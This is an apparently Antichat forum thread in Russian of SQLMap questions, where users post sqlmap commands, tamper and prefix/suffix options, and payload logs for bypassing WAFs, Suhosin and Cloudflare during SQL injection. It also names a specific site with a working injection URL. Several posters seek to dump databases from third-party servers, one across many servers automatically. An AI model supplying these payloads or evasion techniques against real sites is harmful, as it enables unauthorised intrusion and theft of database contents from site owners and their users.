Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее!
    P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более :)
     
  2. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    261
    Likes Received:
    87
    Reputations:
    5
    а это не слепая.
    вот тебе вывод:
    Code:
    h00p://bunnycredits.com/index.php
    ?a=showproduct
    &id=gtid_subset(@@version,0)%23
    
    но там фильтраций много - так что голым скулмапом не выведет. Лучше руками придумать обходы
     
  3. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
    Code:
    --fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
    Code:
    back-end DBMS: MySQL unknown
    [09:35:14] [INFO] fetching database names
    [09:35:14] [INFO] fetching number of databases
    [09:35:14] [PAYLOAD] 1'"
    [09:35:14] [WARNING] reflective value(s) found and filtering out
    [09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
    [09:35:14] [INFO] retrieved:
    [09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
    [09:35:14] [ERROR] unable to retrieve the number of databases
    [09:35:14] [INFO] falling back to current database
    [09:35:14] [INFO] fetching current database
    [09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
    [09:35:15] [INFO] retrieved:
    [09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
    [09:35:15] [CRITICAL] unable to retrieve the database names
     
  4. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    240
    Likes Received:
    65
    Reputations:
    1
    Hi
    you can try with this, it's says you wich sqlmap tamper script can help you bypass this WAF
    https://www.kitploit.com/2018/10/atlas-quick-sqlmap-tamper-suggester.html
    https://github.com/m4ll0k/Atlas
     
  5. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
  6. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
    Code:
    [10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
    [10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
    [10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: MySQL boolean-based blind - Parameter replace (bool*int)
        Payload: class=27&id=(1291=1291)*2659*/!'
    ---
     
  7. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
    Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
     
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,001
    Likes Received:
    1,339
    Reputations:
    43
    Может есть смысл руками ?
     
  9. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Скажите, что делает суффикс -BR (--suffix="-BR")?
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,786
    Likes Received:
    808
    Reputations:
    851
    _________________________
    t0ma5 likes this.
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    -BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
     
    _________________________
    ms13 likes this.
  12. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL

     
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    значение суфикса аномальное, о чем я уже отписался выше. "вопрос про его использование в контекста самого языка MySQL" его используют чтобы кастомезировать выборку из базы, прикрутить лимит или какое то неординарное условие. по факту --suffix просто добавляет строку в конец запроса, о чем собственно сообщил BigBear
     
    _________________________
  14. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Приветствую, как вы пришли к решению включить именно этот тампер?
     
  15. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    Спасибо, этот тампер помог слепую раскрутить, версию определяло, а дальше не шло дело, подрубил этот тампер и сразу всё раскрутило.
     
  16. 717u717

    717u717 New Member

    Joined:
    16 Dec 2015
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Выдало такие данные, можно ли тут что нибудь сделать?
    [11:47:24] [INFO] testing connection to the target URL
    [11:47:24] [WARNING] potential permission problems detected ('Access denied')
    [11:47:24] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
    [11:47:24] [INFO] checking if the target is protected by some kind of WAF/IPS
    [11:47:24] [INFO] heuristics detected web page charset 'ascii'
    [11:47:24] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
    do you want sqlmap to try to detect backend WAF/IPS? [y/N] y
    [11:51:05] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
    [11:51:06] [INFO] using WAF scripts to detect backend WAF/IPS protection
    [11:51:26] [CRITICAL] WAF/IPS identified as 'CloudFlare Web Application Firewall (CloudFlare)'
    are you sure that you want to continue with further target testing? [y/N] y
    [11:56:24] [WARNING] please consider usage of tamper scripts (option '--tamper')
    [11:56:24] [INFO] testing if the target URL content is stable
    [11:56:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
     
  17. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    240
    Likes Received:
    65
    Reputations:
    1
    use different tamper scripts , --hex or -no-cast, change --thread, --time-sec
    google "sqlmap cloudflare tamper script"
    see WAF what and why blocks, and also MUST TRY BYPASS WAF FILTER MANUAL
     
  18. 717u717

    717u717 New Member

    Joined:
    16 Dec 2015
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    я в этом деле новичок, не подскажешь конкретно что это и что с этим можно сделать?
    Изменяюсь за нубские вопросы.
     
  19. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    101
    Reputations:
    1
    Там же написано, .use different tamper scripts, пробуй тампер скрипты, в мапе они есть , как пользльзоватся гугли
     
  20. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    405
    Likes Received:
    37
    Reputations:
    1
    Оставь всё как есть только теперь добавь --tamper=unionalltounion
    и отпиши
     
Loading...